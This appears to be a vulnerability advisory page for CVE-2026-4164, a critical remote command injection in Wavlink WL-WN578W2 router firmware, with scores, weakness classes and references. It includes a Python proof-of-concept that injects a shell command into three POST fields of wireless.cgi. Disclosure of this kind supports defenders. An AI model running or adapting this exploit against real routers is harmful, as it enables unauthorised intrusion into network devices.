Security Vulnerability Report
CVE-2026-4164 CVSS 9.8 CRITICAL

CVE-2026-4164

Published: 2026-03-16 14:19:55
Last Modified: 2026-04-22 21:30:26

Description

A flaw has been found in Wavlink WL-WN578W2 221110. Impacted is the function Delete_Mac_list/SetName/GuestWifi of the file /cgi-bin/wireless.cgi of the component POST Request Handler. Executing a manipulation can lead to command injection. It is possible to launch the attack remotely. The exploit has been published and may be used. It is recommended to upgrade the affected component.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Wavlink WL-WN578W2 firmware version 221110

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

target_ip = "192.168.10.1"  # Router IP address
target_url = f"http://{target_ip}/cgi-bin/wireless.cgi"

# Payload for command injection via SetName function
injection_payload = "; ls -la /etc/ > /tmp/cmd_output.txt;"

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": f"http://{target_ip}/wireless.shtml",
}

# Example 1: SetName function exploitation
data_setname = {
    "SetName": injection_payload,
    "apply": "Apply",
}

# Example 2: Delete_Mac_list function exploitation
data_delete_mac = {
    "Delete_Mac_list": injection_payload,
    "apply": "Apply",
}

# Example 3: GuestWifi function exploitation
data_guest = {
    "GuestWifi": injection_payload,
    "apply": "Apply",
}


def exploit(url, data, func_name):
    """Send malicious request to exploit command injection"""
    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
        print(f"[*] Exploit sent via {func_name} function")
        print(f"[*] Status Code: {response.status_code}")
        if response.status_code == 200:
            print("[+] Command injection successful - check router for output")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


# Execute exploits
print("[*] CVE-2026-4164 PoC - Wavlink WL-WN578W2 Command Injection")
print("[*] Target:", target_ip)
exploit(target_url, data_setname, "SetName")
exploit(target_url, data_delete_mac, "Delete_Mac_list")
exploit(target_url, data_guest, "GuestWifi")
print("[*] Exploitation complete")

Weaknesses

CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, 'Injection')
CWE-77 (Improper Neutralization of Special Elements used in a Command, 'Command Injection')

Additional CVSS Metrics

CVSS 4.0 (secondary): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 4.0 Base Score: 8.9 (HIGH), exploit maturity: proof of concept
CVSS 3.1 (primary): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 3.1 Base Score: 9.8 (CRITICAL), exploitability 3.9, impact 5.9
CVSS 2.0 (secondary): AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS 2.0 Base Score: 10.0, exploitability 10.0, impact 10.0

Record status: Deferred

References

https://dl.wavlink.com/firmware/RD/WINSTAR_WN578W2-A-2026-03-10-94f93d4-WO-mt7628-squashfs-sysupgrade.bin
https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_1/README.md
https://github.com/Litengzheng/vul_db/blob/main/WL-WN578W2/vul_2/README.md
https://vuldb.com/?ctiid.351071
https://vuldb.com/?id.351071
https://vuldb.com/?submit.768292
https://vuldb.com/?submit.768293
https://vuldb.com/?submit.768294